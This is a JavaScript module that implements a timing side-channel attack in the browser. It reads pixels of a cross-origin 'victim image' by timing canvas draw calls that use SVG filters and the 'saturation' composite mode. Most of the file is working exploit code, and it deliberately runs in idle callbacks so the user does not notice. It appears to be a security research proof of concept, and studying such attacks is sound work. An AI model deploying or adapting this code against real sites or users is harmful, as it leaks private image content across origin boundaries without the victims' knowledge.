import { requestIdleCallback, cancelIdleCallback } from '../idle.js';
import { rgbaNoise } from '../noise.js';

// rgbFilters['r'] converts pixels with r=255 to rgba(0, 0, 255, 255).
// anything else is transparent. the other two follow a similar pattern.
const rgbFilters = Object.create(null);
rgbFilters['r'] = 'url(filters.svg#fullred2blue-else2transparent)';
rgbFilters['g'] = 'url(filters.svg#fullgreen2blue-else2transparent)';
rgbFilters['b'] = 'url(filters.svg#fullblue2blue-else2transparent)';

// if smoothing has any effect, it will be to degrade performance and muck up
// canvas contents, so we'll just disable it on all of our canvases.
function disableSmoothing(ctx) {
  ctx.mozImageSmoothingEnabled = ctx.webkitImageSmoothingEnabled = ctx.msImageSmoothingEnabled = ctx.imageSmoothingEnabled = false;
}

// `crossOriginWithFilter`, so named because it requires support for c2d's
// `filter` property. The attack doesn't depend on that support, but I haven't
// written `crossOriginWithoutFilter` yet.
export default function crossOriginWithFilter(img, pattern, options) {
  options = options || {};
  // the "arena" is the canvas in which the timed draw calls are made.
  // a larger arena produces more reliable results at the cost of speed.
  const arenaWidth = options.arenaWidth || 48;
  const arenaHeight = options.arenaHeight || arenaWidth;
  // the number of draw calls to perform before starting in order to account
  // for clients with different draw performance.
  const calibrationSteps = options.calibrationSteps || 10;
  
  // I use a noisy background because my benchmarks said it would net me the
  // biggest performance difference.
  const noise = rgbaNoise(arenaWidth, arenaHeight);
  
  // the aforementioned arena, in which the timed draw calls are made.
  const arena = document.createElement('canvas');
  arena.width = arenaWidth;
  arena.height = arenaHeight;
  const arenaCtx = arena.getContext('2d');
  // the 'saturation' composite operation is normally very slow, but it's fast
  // when the source image is completely transparent. there are many other
  // composite operations with similarly incriminating properties, but
  // saturation seems to have the largest breadth.
  arenaCtx.globalCompositeOperation = 'saturation';
  disableSmoothing(arenaCtx);
  
  // the over canvas is a single pixel, either blue or transparent.
  // it's the image we draw directly into the arena (scaled up).
  const over = document.createElement('canvas');
  over.width = over.height = 1;
  const overCtx = over.getContext('2d');
  // we need a default filter to use to handle greyscale queries.
  // it doesn't matter which one it is.
  overCtx.filter = rgbFilters['r'];
  overCtx.globalCompositeOperation = 'copy';
  disableSmoothing(overCtx);
  
  // the scratch canvas is where we manipulate the pixel before running it
  // through one of the rgbFilters.
  const scratch = document.createElement('canvas');
  scratch.width = scratch.height = 1;
  const scratchCtx = scratch.getContext('2d');
  disableSmoothing(scratchCtx);
  
  // returns the amount of time it takes to draw `over` into the arena.
  function time(over) {
    arenaCtx.putImageData(noise, 0, 0);
    const start = performance.now();
    arenaCtx.drawImage(over, 0, 0, arenaWidth, arenaHeight);
    return performance.now() - start;
  }
  
  let averageTime = 0;
  // this is a little messy.
  // we just want to make sure the calibration steps happen under the same kind
  // of circumstances as the rest of the measurements. I previously had trouble
  // in Chrome when crossOriginWithFilter was called from a timeout, because
  // the performance was completely different from if it had been called from an
  // animation frame.
  function getAverageTime() {
    if(averageTime) return averageTime;
    
    overCtx.fillStyle = '#fff';
    overCtx.fillRect(0, 0, 1, 1);
    for(let i = 0; i < calibrationSteps; ++i) {
      averageTime += time(over);
    }
    
    overCtx.fillStyle = '#000';
    overCtx.fillRect(0, 0, 1, 1);
    for(let i = 0; i < calibrationSteps; ++i) {
      averageTime += time(over);
    }
    
    // nothing fancy. just a midpoint between light and dark performance.
    return averageTime /= calibrationSteps * 2;
  }
  
  function measure({ x, y, z, channel }) {
    if(channel in rgbFilters) {
      // r, g, or b
      scratchCtx.filter = 'none';
      overCtx.filter = rgbFilters[channel];
    } else {
      // brightness
      scratchCtx.filter = 'grayscale(100%)';
      // it doesn't matter which of the rgbFilters we're using as long as we're
      // using one of them.
    }
    z = (1 - z) * 255 |0;
    
    // grab a pixel from the victim image.
    scratchCtx.globalCompositeOperation = 'copy';
    scratchCtx.drawImage(img, -x, -y);
    
    // then perform an addition on it, so that channels above a certain
    // threshold hit 255.
    scratchCtx.filter = 'none';
    scratchCtx.globalCompositeOperation = 'lighter';
    scratchCtx.fillStyle = `rgb(${z}, ${z}, ${z})`;
    scratchCtx.fillRect(0, 0, 1, 1);
    
    // then run it through overCtx's filter to convert it to blue or
    // transparent.
    overCtx.drawImage(scratch, 0, 0);
    
    // finally, time it. light pixels take longer.
    return time(over) > getAverageTime();
  }
  
  // and now we just have to follow the pattern.
  // we use the requestIdleCallback ponyfill so the user won't notice a drop
  // in performance.
  
  let next = pattern.next();
  
  let callbackID = requestIdleCallback(function step(deadline) {
    try {
      do {
        if(next.done) {
          return;
        }
        next = pattern.next(measure(next.value));
      } while(deadline.timeRemaining() > 0);
      
      callbackID = requestIdleCallback(step);
    } catch(e) {
      pattern.throw(e);
    }
  });
  
  return {
    cancel() {
      cancelIdleCallback(callbackID);
    },
  };
};
